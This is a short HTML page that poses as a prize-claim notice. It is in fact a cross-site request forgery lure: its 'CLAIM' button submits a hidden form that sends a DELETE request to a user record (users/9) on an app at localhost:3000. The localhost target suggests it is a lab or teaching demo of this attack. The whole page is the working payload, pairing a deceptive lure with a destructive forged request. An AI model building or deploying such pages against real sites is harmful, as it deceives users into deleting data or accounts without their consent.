<h1>CONGRATULATIONS YOU ARE THE 1 TRILLIONTH VISITOR</h1>
<img
  src="https://media0.giphy.com/media/v1.Y2lkPTc5MGI3NjExZDRtY3gwc2VsdXBjZHEzZXZ0aXc3ZGg1NHdxcHpyMHg4enF0cjdwcCZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/26tOZ42Mg6pbTUPHW/giphy.gif" />
<h2>Click to claim your prize</h2>
<form action="http://localhost:3000/users/9" method="POST">
  <input type="hidden" name="_method" value="DELETE" />
  <input type="submit" value="CLAIM" />
</form>